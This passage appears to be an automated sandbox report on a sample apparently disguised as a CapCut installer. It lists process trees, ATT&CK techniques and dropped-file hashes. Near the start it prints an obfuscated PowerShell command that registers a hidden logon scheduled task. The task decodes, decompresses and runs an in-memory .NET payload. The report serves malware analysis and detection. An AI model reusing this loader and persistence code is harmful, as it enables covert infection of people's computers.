        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -c $taskName = 'CFoxMaint';$taskExe = 'C:\Users\Admin\AppData\Local\taskUnity\task.exe';$taskarg = '\"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe\" \"-w\" \"hidden\" \"-c\" \"$tzwE=''FltzwEmutzwEmstzwEmh''.Replace(''tzwEm'', '''');$mkBB=''WtzwEmritzwEmttzwEme''.Replace(''tzwEm'', '''');$tZkW=''RtzwEmetzwEmatzwEmd''.Replace(''tzwEm'', '''');$SOor=''LtzwEmotzwEmatzwEmd''.Replace(''tzwEm'', '''');$HDXk=''RtzwEmeatzwEmdtzwEmAtzwEmlltzwEmTtzwEmextzwEmt''.Replace(''tzwEm'', '''');$nZyV=''EntzwEmttzwEmrytzwEmPotzwEmintzwEmt''.Replace(''tzwEm'', '''');$eUve=''IntzwEmvtzwEmoktzwEme''.Replace(''tzwEm'', '''');$YBBZ=''FrtzwEmomtzwEmBatzwEmsetzwEm64tzwEmStzwEmtrtzwEming''.Replace(''tzwEm'', '''');function cSUex($kGFsz){$SjAZa=New-Object System.IO.MemoryStream(,$kGFsz);$zIanR=New-Object System.IO.MemoryStream;$vRvnd=New-Object System.IO.Compression.GZipStream($SjAZa,[IO.Compression.CompressionMode]::Decompress);$hRgEv = New-Object System.IO.BinaryWriter($zIanR);$bRTaW = New-Object byte[](1024);while($true){$FgteA = $vRvnd.$tZkW($bRTaW,0,1024);if($FgteA -le 0){break;}$hRgEv.$mkBB($bRTaW,0,$FgteA);$hRgEv.$tzwE();}$vRvnd.Dispose();$SjAZa.Dispose();$hRgEv.Close();$zIanR.Dispose();$zIanR.ToArray();}function JeGso($kGFsz){$PzChi=[System.Convert]::$YBBZ(''hkguTzSCb75g7sJ9ChMcmAOPpeBL9ZJy/tejnoCjT+E='');For ($i=0; $i -lt $kGFsz.Length; $i++){$ix = $i % $PzChi.Length;$kGFsz[$i] = $kGFsz[$i] -bxor $PzChi[$ix];}$kGFsz;}$YjPOO = cSUex(JeGso([Convert]::$YBBZ([System.IO.File]::$HDXk(''C:\Users\Admin\AppData\Local\Pac\data2.txt''))));[System.Reflection.Assembly]::$SOor([byte[]]$YjPOO).$nZyV.$eUve($null,$null);\"';$taskWD = 'C:\Users\Admin\AppData\Local\Pac';$taskExists = Get-ScheduledTask | Where-Object {$_.TaskName -like $taskName };$A = New-ScheduledTaskAction -Execute $taskExe -WorkingDirectory $taskWD -Argument $taskarg;if($taskExists) {Set-ScheduledTask -TaskName $taskName -Action $A;} else {$T = New-ScheduledTaskTrigger -AtLogOn -User ($env:USERNAME);$S = New-ScheduledTaskSettingsSet -StartWhenAvailable -Hidden -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0;$D = New-ScheduledTask -Action $A -Trigger $T -Settings $S;Register-ScheduledTask -TaskName $taskName -InputObject $D;}
        11⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2480
- - C:\Users\Admin\AppData\Roaming\dcw_global\app\rhc.exe
    C:\Users\Admin\AppData\Roaming\dcw_global\app\rhc.exe C:\Users\Admin\AppData\Roaming\dcw_global\app\php.exe C:\Users\Admin\AppData\Roaming\dcw_global\app\index.php
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:4744
  - - C:\Users\Admin\AppData\Roaming\dcw_global\app\php.exe
      C:\Users\Admin\AppData\Roaming\dcw_global\app\php.exe C:\Users\Admin\AppData\Roaming\dcw_global\app\index.php
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious behavior: EnumeratesProcesses
      PID:3608
- C:\Users\Admin\AppData\Local\Programs\capcut\CapCut.exe
  "C:\Users\Admin\AppData\Local\Programs\capcut\CapCut.exe" --type=gpu-process --field-trial-handle=1604,1942941187608324641,9094561502162094769,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand --user-data-dir="C:\Users\Admin\AppData\Roaming\capcut" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAANAAAAEAAAAAAAAAABAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1624 /prefetch:2
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:3168
- C:\Users\Admin\AppData\Local\Programs\capcut\CapCut.exe
  "C:\Users\Admin\AppData\Local\Programs\capcut\CapCut.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1604,1942941187608324641,9094561502162094769,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\capcut" --standard-schemes=app --secure-schemes=app --bypasscsp-schemes --cors-schemes --fetch-schemes --service-worker-schemes --streaming-schemes --mojo-platform-channel-handle=1920 /prefetch:8
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  PID:2776
- C:\Users\Admin\AppData\Local\Programs\capcut\CapCut.exe
  "C:\Users\Admin\AppData\Local\Programs\capcut\CapCut.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\capcut" --standard-schemes=app --secure-schemes=app --bypasscsp-schemes --cors-schemes --fetch-schemes --service-worker-schemes --streaming-schemes --app-path="C:\Users\Admin\AppData\Local\Programs\capcut\resources\app.asar" --no-sandbox --no-zygote --node-integration-in-worker --field-trial-handle=1604,1942941187608324641,9094561502162094769,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=2640 /prefetch:1
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  PID:3588
- C:\Users\Admin\AppData\Local\Programs\capcut\CapCut.exe
  "C:\Users\Admin\AppData\Local\Programs\capcut\CapCut.exe" --type=gpu-process --field-trial-handle=1604,1942941187608324641,9094561502162094769,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\Admin\AppData\Roaming\capcut" --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAIAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAANAAAAEAAAAAAAAAABAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3348 /prefetch:2
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:3360

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2104

C:\Users\Admin\AppData\Roaming\dcw_global\app\rhc.exe
C:\Users\Admin\AppData\Roaming\dcw_global\app\rhc.exe php.exe index.php
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4488
- C:\Users\Admin\AppData\Roaming\dcw_global\app\php.exe
  php.exe index.php
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  PID:3908

C:\Users\Admin\AppData\Roaming\dcw_global\app\rhc.exe
C:\Users\Admin\AppData\Roaming\dcw_global\app\rhc.exe php.exe index.php
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2188
- C:\Users\Admin\AppData\Roaming\dcw_global\app\php.exe
  php.exe index.php
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:3424

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Programs\capcut\D3DCompiler_47.dll

Filesize
4.3MB

MD5
7641e39b7da4077084d2afe7c31032e0

SHA1
2256644f69435ff2fee76deb04d918083960d1eb

SHA256
44422e6936dc72b7ac5ed16bb8bcae164b7554513e52efb66a3e942cec328a47

SHA512
8010e1cb17fa18bbf72d8344e1d63ded7cef7be6e7c13434fa6d8e22ce1d58a4d426959bdcb031502d4b145e29cb111af929fcbc66001111fbc6d7a19e8800a5

Download Submit
C:\Users\Admin\AppData\Local\Programs\capcut\chrome_100_percent.pak

Filesize
138KB

MD5
4f7cf265db503b21845d2df4dc903022

SHA1
970b35882db6670c81bd745bdeed11f011c609da

SHA256
c48e6d360aee16159d4be43f9144f77d3275a87b3f77eae548e357601c55fc16

SHA512
5645d2c226697c7ac69ce73e9124630696516fc18286a5579823588f93a936da71084a3850f1f9a7b34c624f4c502957107f5957ffba5e6c1e4da6d8da7d3348

Download Submit
C:\Users\Admin\AppData\Local\Programs\capcut\chrome_200_percent.pak

Filesize
202KB

MD5
6a7a9dee6b4d47317b4478dba3b2076c

SHA1
e9167673a3d25ad37e2d83e04af92bfda48f0c86

SHA256
b820d19a7a8ce9d12a26837f967f983e45b07550b49e7b9a25e57b417c5f6fd9

SHA512
67466e21a13ca449b014b511fb49bfc51df841eb5776f93b4bda2e0023da96d368ac5c65de051ed9de1899275b9f33839af2c387be903688cdb48bf08993791e

Download Submit
C:\Users\Admin\AppData\Local\Programs\capcut\ffmpeg.dll

Filesize
2.6MB

MD5
7977f3720aa86e0ec2ad2de44ad42004

SHA1
04a4ef5ccd72aa5d050cc606a7597a3b388c6400

SHA256
61c6bd5fee2c150265241a15379c4053b174b1cd7687749629afcdbd1264a02e

SHA512
8ef3b8f506b5ad7241b96d381a501033266358fb3756a457c46ed499547db1232012f849838e65f916129fab1a0d74711e9851b8e0669831acbbf4c3494e492d

Download Submit
C:\Users\Admin\AppData\Local\Programs\capcut\icudtl.dat

Filesize
9.7MB

MD5
2e7d2f6c3eed51f5eca878a466a1ab4e

SHA1
759bd98d218d7e392819107fab2a8fd1cfc63ddf

SHA256
b62b7240837172959299dc3be44fffa83dc374353154eca1612e1bde330aa8fa

SHA512
0f1465e8efe32b0eaba628a30bbb21254a05d80f4407a1434120a55fb928cf575b3879e1b7cf754cd19b23c262ae715fa84a8049073563cb38f1855be7db1124

Download Submit
C:\Users\Admin\AppData\Local\Programs\capcut\libEGL.dll

Filesize
431KB

MD5
7b77074945dfe5cf0b1c5a3748058d57

SHA1
fdea507ac2be491b8ad24ddc1030ea9980c94c0d

SHA256
994972c1bc515c199552d50e97ad217ae15a3eed16db06181c7df50e743e8a56

SHA512
d637b2c7d75723601af099317a39820d3edbd3cea1e1cb20b702deb6ca7fdb0b67e1351cc8fee1c7badff957fffb848a8dce18bb25bfd60c81a588da4f68c1fd

Download Submit
C:\Users\Admin\AppData\Local\Programs\capcut\libGLESv2.dll

Filesize
7.6MB

MD5
8c93e19281992a00993fc0f09e272917

SHA1
3a2d12bc85f829775ec8c5c1f8e35a783d37b7a7

SHA256
1ebc1da8d7e463a5d3dc127a632989ef35cfbd94cb18bf1f8ee790f172d43703

SHA512
c4ec65378d83e6645c9128825853de2d3e82c0f430cd28fdc761eaf2d011267c3794b7c1dcef017750323873d7fe976656eebf9ed7c03582741d43738f3e0c7c

Download Submit
C:\Users\Admin\AppData\Local\Programs\capcut\locales\en-US.pak

Filesize
104KB

MD5
0dcd84e9e50a3e0819d5875ea889ced4

SHA1
7c47f6e4e0cafec3a13c07d689d1dd6ff6516b1e

SHA256
699b6d7f05a484e76d3e1197a656247863e570f03cc02634c9dc42078a5c5007

SHA512
153fc15f676d78d5d0f3a6862fc7eaa60c2a659c25ce87485f0253c321d9407a9b799b959104c27a8e7b5487f0de926ae8f375e2c3d313329112e48f2d001a17

Download Submit
C:\Users\Admin\AppData\Local\Programs\capcut\resources.pak

Filesize
4.9MB

MD5
99c5bf0dcd43f961aa3e177f7dc42d42

SHA1
5618abd2e7b45c50400bb4aa0c455bb0b28bc472

SHA256
75ff04d991c2a203105525a1ccb200a461717ce7b86ada4be092fe903d95cdc8

SHA512
2e508c46eb266301f42ee6a7d63494f3856b422df61d0b605096bf4fc4943239d3fba15161adf8cb1cdcfd3bea8608102a0abce636999cc2a9e01bda51cc77ae

Download Submit
C:\Users\Admin\AppData\Local\Programs\capcut\resources\app.asar

Filesize
2.9MB

MD5
6c28f36a1cfd1132f866697821b8d266

SHA1
725e06459549883332d3504b232c33f7eb0e887b

SHA256
8ba06d25419b7fbcecf5fce6a8451ee02f818a0b6315c67183a336c24fa02ad3

SHA512
e0246d25bc9f93303b7aa9edf5b05f96e72b7c1f748f04ef914f28d370f3a179c4302ec7527bd75402e5ec5b03129088391bde7917e9d7aa777893fb9315efcd

Download Submit
C:\Users\Admin\AppData\Local\Programs\capcut\v8_context_snapshot.bin

Filesize
160KB

MD5
a718c9b6e5e6563e23e450a0d01b932a

SHA1
95ccb1228f024f037259e759dbac464f3c27b8cf

SHA256
315f5ed966a1f3a89c94d1b78b9bf70e59a2869601cf6551b2c1fd3e3b008447

SHA512
b04512e95ab3997bc7d5c65e2f526e124bf1895b139eb2b6c6c7b4a4aa381cd408eb2bba01f44b09b1936d24752baae288f24a32ed84687d3e7e0681b5387d01

Download Submit
C:\Users\Admin\AppData\Local\Temp\BlueFiles\Old\f62bed275b1178d0fa6544359e280e97\LS

Filesize
389B

MD5
bd2be6e39931d7546db12e0ba925bc1c

SHA1
afe7045b214751c3b02711a5ad58c493e4169f00

SHA256
cc607a181585df0384e3d73e6f65ba7d5b14ce1eeac9660a4250f0ded231674e

SHA512
416a2c84ec04b5f43c8dfc95093551e49940153c88d63a47f83cd0705d0f4ad469e93008621fce0fdb003f682bdb92d84cad509fe287924be60bd02590eae8ec

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nkd423yp.qhy.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsf7904.tmp\SpiderBanner.dll

Filesize
9KB

MD5
17309e33b596ba3a5693b4d3e85cf8d7

SHA1
7d361836cf53df42021c7f2b148aec9458818c01

SHA256
996a259e53ca18b89ec36d038c40148957c978c0fd600a268497d4c92f882a93

SHA512
1abac3ce4f2d5e4a635162e16cf9125e059ba1539f70086c2d71cd00d41a6e2a54d468e6f37792e55a822d7082fb388b8dfecc79b59226bbb047b7d28d44d298

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsf7904.tmp\StdUtils.dll

Filesize
100KB

MD5
c6a6e03f77c313b267498515488c5740

SHA1
3d49fc2784b9450962ed6b82b46e9c3c957d7c15

SHA256
b72e9013a6204e9f01076dc38dabbf30870d44dfc66962adbf73619d4331601e

SHA512
9870c5879f7b72836805088079ad5bbafcb59fc3d9127f2160d4ec3d6e88d3cc8ebe5a9f5d20a4720fe6407c1336ef10f33b2b9621bc587e930d4cbacf337803

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsf7904.tmp\System.dll

Filesize
12KB

MD5
0d7ad4f45dc6f5aa87f606d0331c6901

SHA1
48df0911f0484cbe2a8cdd5362140b63c41ee457

SHA256
3eb38ae99653a7dbc724132ee240f6e5c4af4bfe7c01d31d23faf373f9f2eaca

SHA512
c07de7308cb54205e8bd703001a7fe4fd7796c9ac1b4bb330c77c872bf712b093645f40b80ce7127531fe6746a5b66e18ea073ab6a644934abed9bb64126fea9

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsf7904.tmp\WinShell.dll

Filesize
3KB

MD5
1cc7c37b7e0c8cd8bf04b6cc283e1e56

SHA1
0b9519763be6625bd5abce175dcc59c96d100d4c

SHA256
9be85b986ea66a6997dde658abe82b3147ed2a1a3dcb784bb5176f41d22815a6

SHA512
7acf7f8e68aa6066b59ca9f2ae2e67997e6b347bc08eb788d2a119b3295c844b5b9606757168e8d2fbd61c2cda367bf80e9e48c9a52c28d5a7a00464bfd2048f

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsf7904.tmp\nsExec.dll

Filesize
6KB

MD5
ec0504e6b8a11d5aad43b296beeb84b2

SHA1
91b5ce085130c8c7194d66b2439ec9e1c206497c

SHA256
5d9ceb1ce5f35aea5f9e5a0c0edeeec04dfefe0c77890c80c70e98209b58b962

SHA512
3f918f1b47e8a919cbe51eb17dc30acc8cfc18e743a1bae5b787d0db7d26038dc1210be98bf5ba3be8d6ed896dbbd7ac3d13e66454a98b2a38c7e69dad30bb57

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsf7904.tmp\nsis7z.dll

Filesize
424KB

MD5
80e44ce4895304c6a3a831310fbf8cd0

SHA1
36bd49ae21c460be5753a904b4501f1abca53508

SHA256
b393f05e8ff919ef071181050e1873c9a776e1a0ae8329aefff7007d0cadf592

SHA512
c8ba7b1f9113ead23e993e74a48c4427ae3562c1f6d9910b2bbe6806c9107cf7d94bc7d204613e4743d0cd869e00dafd4fb54aad1e8adb69c553f3b9e5bc64df

Download Submit
C:\Users\Admin\AppData\Local\taskUnity\task.exe

Filesize
1KB

MD5
abc6379205de2618851c4fcbf72112eb

SHA1
1ed7b1e965eab56f55efda975f9f7ade95337267

SHA256
22e7528e56dffaa26cfe722994655686c90824b13eb51184abfe44d4e95d473f

SHA512
180c7f400dd13092b470e3a91bf02e98ef6247c1193bf349e3710e8d1e9003f3bc9b792bb776eacb746e9c67b3041f2333cc07f28c5f046d59274742230fb7c1

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Spelling\en-US\default.dic

Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
C:\Users\Admin\AppData\Roaming\capcut\Network Persistent State

Filesize
393B

MD5
9c0f219e3c16ea589cff235e3639a725

SHA1
bd97a9c7a882f5611b4664831147fba3b56be6c0

SHA256
af725bd61c07e1c3ebe96fb2c4be653a444c90cb75c5f05a77abfc8b3585186d

SHA512
ef518747fcd7a73d26e3297d5c62f2b9cf9eb22c3d7a5c4d37766bb7ca397d3c1151045fdea2aa892df8bc41e561ad2f7d9690eb068147f28eaa391690c4157d

Download Submit
C:\Users\Admin\AppData\Roaming\capcut\Network Persistent State~RFe59b982.TMP

Filesize
59B

MD5
2800881c775077e1c4b6e06bf4676de4

SHA1
2873631068c8b3b9495638c865915be822442c8b

SHA256
226eec4486509917aa336afebd6ff65777b75b65f1fb06891d2a857a9421a974

SHA512
e342407ab65cc68f1b3fd706cd0a37680a0864ffd30a6539730180ede2cdcd732cc97ae0b9ef7db12da5c0f83e429df0840dbf7596aca859a0301665e517377b

Download Submit
C:\Users\Admin\AppData\Roaming\dcw_global\app\5af05aada5530eb8b79a15b2c6975e2e

Filesize
134KB

MD5
5af05aada5530eb8b79a15b2c6975e2e

SHA1
9b64b2fcc8555bb581e9076ad250798a1bc62332

SHA256
1a6ddd5d9c590eef50bd9e1e186b6038d7a4d286e0b934bd7de541b2a6221194

SHA512
de32b791b79e2f22d70fd333131f4e2ae8b67ef045a9eb85ba572376d85961b21e56d263c1942bd7543a7bebb40841e50eea6f01384c8da10cb27a8e72f84302

Download Submit
C:\Users\Admin\AppData\Roaming\dcw_global\app\8ba1552a656aa48cf77ec59330d8a5b0

Filesize
621KB

MD5
8ba1552a656aa48cf77ec59330d8a5b0

SHA1
0a1ff9ea5247dcc7ffceec647b069263062af07b

SHA256
61f883bfc6e7ac4c78e632f0b0baec516a18b784f090f6adba2058f8dfcb2299

SHA512
b3ac73fb2a1a7a95d8713e8b1a87629c4971ba675af86dfb3d0faee9dc072fdffce8a8fea93a5d74148ea0aeed8e1cf59cf4e989ca1746907db4cfe23d368c01

Download Submit
C:\Users\Admin\AppData\Roaming\dcw_global\app\MSVCR110.dll

Filesize
829KB

MD5
7c3b449f661d99a9b1033a14033d2987

SHA1
6c8c572e736bc53d1b5a608d3d9f697b1bb261da

SHA256
ae996edb9b050677c4f82d56092efdc75f0addc97a14e2c46753e2db3f6bd732

SHA512
a58783f50176e97284861860628cc930a613168be70411fabafbe6970dcccb8698a6d033cfc94edf415093e51f3d6a4b1ee0f38cc81254bdccb7edfa2e4db4f8

Download Submit
C:\Users\Admin\AppData\Roaming\dcw_global\app\SSLEAY32.dll

Filesize
348KB

MD5
6e59ae2ea370b626db1097d2aae8f82d

SHA1
a4950d9ffb4e3d377faf815580cc2ac94a0b5d7f

SHA256
232b6e686b151056109587faa7f9cce500a85ad123b8832a3e833d67d4b4e588

SHA512
c8dc0b6037d1de4c334f5ca87e22f7f7d672806114bb8ff330100664a38d5c0f276fc2fdb26718535f8803de9828c50e511df97e6eaf96e00e87e4a086b07157

Download Submit
C:\Users\Admin\AppData\Roaming\dcw_global\app\ext\ioncube\ioncube_loader_win_5.6.dll

Filesize
916KB

MD5
db7b67aa2d1744b8d55aa3ae1f0aad95

SHA1
a05fe65d4cdb8b8e3c29c900bd2cb8272668d627

SHA256
d768ca023105c16421f921e5ea4106c456ceb8b0c709ac874d33c63c7ece4ab1

SHA512
084ffd496cd7d92eaee814f36f9e1e5a001979ee8cfcd13630ca26d7157e9f584018ee090a29978c5b45179b8b8e74238ac5c37b28f5d9672ffa1798dea12482

Download Submit
C:\Users\Admin\AppData\Roaming\dcw_global\app\ext\php_bz2.dll

Filesize
77KB

MD5
82ecccc4d0a15a29af540d9c3fc383ca

SHA1
5afac221180db13b9ba609c0dd03cc915cc17d54

SHA256
82825b06716705b65d69a8184f2ae83c1e02d2fa468a5a6933f023a29bbf0b61

SHA512
76541c44890dbc17f6153960710e5d48df5af8a18b69880e83fe22295f47bcd5deb06edbb45f252d98105e0254f7688a38c97ca6df966f16b3d96ecec8304fa3

Download Submit
C:\Users\Admin\AppData\Roaming\dcw_global\app\ext\php_curl.dll

Filesize
492KB

MD5
c398bd14714253f5b82858c35c28fae9

SHA1
c1a2bd5083ae6780b0e3dc5b4feea58b082eec85

SHA256
f48a6fb640c77418f41c9afe82ab915fcd7228f4517d8905943e0cd2c8f6e018

SHA512
a9bcc484b1731b86e05be807832bfb808f0ff92155859f53a243cbd2591aab610362579cfc375da713d09d256602481d0f2cc86e4cd4925d60bd3c32ce912408

Download Submit
C:\Users\Admin\AppData\Roaming\dcw_global\app\ext\php_fileinfo.dll

Filesize
2.7MB

MD5
6606cab4a5f76f69fba6666bd063f5bc

SHA1
0490ad0d479e35d09f597cc50fba2720b18971f3

SHA256
ad201ec9f0297306f9deedf885d2582af5bd8960bb461763d070125f26ac89fa

SHA512
9745c52da604e89366256f583ec0b178ee021d4ddf7c728698b700a1c0345e90777b52b05bdab459c0f6bd3423d7969722a90ae14097ddd5eccd3c5333b55fed

Download Submit
C:\Users\Admin\AppData\Roaming\dcw_global\app\ext\php_gd2.dll

Filesize
1.4MB

MD5
0d1116df0c3be38c5cd037093a16c73a

SHA1
af6c2018cb765ac9521323cae135d44adeb04f77

SHA256
30c89e81d43a692defa515ccd91ce0b45fa8fa1a6ac444b4b6f56943355c945c

SHA512
330e0c1354ea7e4d803c00588c410f0b1675972447cb7c3e6eaad7513fa717bcc7e0b5c77981edf1e56ba1d7ddbbe9317a967a62ba320d4f061de0b8e218fa25

Download Submit
C:\Users\Admin\AppData\Roaming\dcw_global\app\ext\php_mbstring.dll

Filesize
1.3MB

MD5
777de2e4423dbef2de8dc9461382d15a

SHA1
cf2283da35aea738f56cdde18a33f5dc8919c9db

SHA256
be689f1c4947ba9356fa79bda4d6601e95408bd415084b6232e289943fbd85ba

SHA512
0229d8414cf55f246f0b8434e41886db6d4eca4a781fe61c8b634c12843ec923b5d0a88dfe841799be8eb1c6e7cb0d608b26c089e86e3596322989223d902183

Download Submit
C:\Users\Admin\AppData\Roaming\dcw_global\app\ext\php_openssl.dll

Filesize
100KB

MD5
61999febf6b2e8a5fd9d721022c8486b

SHA1
bf8cb2dc8cce2d36751c3694b5e7f663f144be2f

SHA256
1ab58d6762f12a5bf9a4c4bc5c474257c1f468fa69b0677252921020f9b55a7b

SHA512
3bdec1b6f5d34d0620dbaaa4386beaff7c2e7946bd56b10b87dc5f30578956d7f5baad2ab51f2cf95ccf6e6d4bf155cb8ddabdeded7f133921227dd98a52e7bb

Download Submit
C:\Users\Admin\AppData\Roaming\dcw_global\app\ext\php_pdo_sqlite.dll

Filesize
577KB

MD5
843f0185dcc847a44ebb21aa08f3daeb

SHA1
9d2214cb66a332725eb196b8a33182bb8155fcb7

SHA256
301d90953cbcc314082f92eb360f3355b297093e35907bb710127242f5c50297

SHA512
2c1570469ed81274bc7a120b3274cb6de211c1267a79dbf5898defbd14124657778d772fa0b61fd589db31bb5b162bffe14a8cef571de0ae00129adf142d0b48

Download Submit
C:\Users\Admin\AppData\Roaming\dcw_global\app\libeay32.dll

Filesize
2.2MB

MD5
72ab83ee24009ea1d6f47db123abcef0

SHA1
f1152140367f0ad1224d3d811797878b0048a664

SHA256
9a5db002753a627ed51484eb88e6aa9c7bad10c120c772eaa5e7ce826d92af64

SHA512
1ee0c50e0e5c9ea1736729eba7e38097ccd2fa7729fb4b0d634229c1a103bf4122afd2060a8c418db5a1b948605a310e31dcd1d235aa098ea0373083322eddbb

Download Submit
C:\Users\Admin\AppData\Roaming\dcw_global\app\libssh2.dll

Filesize
208KB

MD5
63ebfa6a323708e5e09a82ddaa7261ec

SHA1
80283697551ef70a7877a72be8826b9915efd82b

SHA256
b1438bd5de2961d71a028ca5ac38507ff2e6e3577e4649a8fc5262f8c82cc8aa

SHA512
32326463073671f351ecf9d448aa48b5ef6c3dea7d6aceec3f9fe25565fbc23511864b725edf5a378467aaf7bf1562893f81e10223ad52a56b90ce9d8ebaff44

Download Submit
C:\Users\Admin\AppData\Roaming\dcw_global\app\php.exe

Filesize
76KB

MD5
34f95889380b92044e958eab7fb561b1

SHA1
fbf6a62f4523b0a0316db49d277b69021136457a

SHA256
6845b8905a3fade342f427af97875118d4c7fb3d382cda245dc77e1cb930464c

SHA512
9274003a161c714373999ba71d51557cc718ee3ecfa57f82691b9edd3d682e13c59da1d1ba8a8858b58ecc981f29f1b01ed31528b65844046a2cd659bc28b9d9

Download Submit
C:\Users\Admin\AppData\Roaming\dcw_global\app\php.ini

Filesize
3KB

MD5
a9f9a482c90095bc95616b4e6aedb6db

SHA1
d0034a38c2d5fc9971266bdf41fd0c56bd23f737

SHA256
1a914ac00ffba69edf389369913a19a5723e9a9f196311d6c1232905b171579e

SHA512
e30e03e7423797ef14a0b5cdc65b752ef1003ca041012028e5a40bd19279002552a6d0a514bda54fc1235ec7f7cc96b7439abed3ee2ab21041641186961a4b7a

Download Submit
C:\Users\Admin\AppData\Roaming\dcw_global\app\php5.dll

Filesize
7.8MB

MD5
7e7576314844051ceefa1820d20d7e6c

SHA1
3fe8f1b89d72246919fd2bfab8778e54fb8bc1f2

SHA256
e40184b3e5ff76fbc0f777f4717f2825531b0169bcdca13623254aa00584bea9

SHA512
364e5c0e8853af49919867e18bc5aebc4af8203ecf940706173147d57ff9038f35c93583f45b066f1aeb6fec2f4c6d47d4cd024e945ac8dd30fe105a6eefdcb7

Download Submit
C:\Users\Admin\AppData\Roaming\dcw_global\zin.zip

Filesize
22.0MB

MD5
ff6d446d8221db6e72df5368f46ba8e9

SHA1
8263b78eea17a07605f15140f5379cc4ea2fee3c

SHA256
3d7668280fa4b16f70705539ba1e4ea17eef344c81e82881cbeca26fb7f181f1

SHA512
2ada13dac5563c8aab1aa5da6b0b570480bd09f4ed673d721f9caa7b6032ff1aa555ae08e2a38eedc0e81cc3b200595a96369b23e1d74dcfb1ace093b6bd98e3

Download Submit
memory/800-438-0x0000027CC2280000-0x0000027CC22B8000-memory.dmp

Filesize
224KB

Download
memory/1156-474-0x000002867FC70000-0x000002867FC92000-memory.dmp

Filesize
136KB

Download
memory/2480-541-0x0000000006400000-0x000000000641E000-memory.dmp

Filesize
120KB

Download
memory/2480-545-0x0000000007370000-0x0000000007381000-memory.dmp

Filesize
68KB

Download
memory/2480-544-0x0000000007410000-0x00000000074A6000-memory.dmp

Filesize
600KB

Download
memory/2480-543-0x00000000071D0000-0x00000000071DA000-memory.dmp

Filesize
40KB

Download
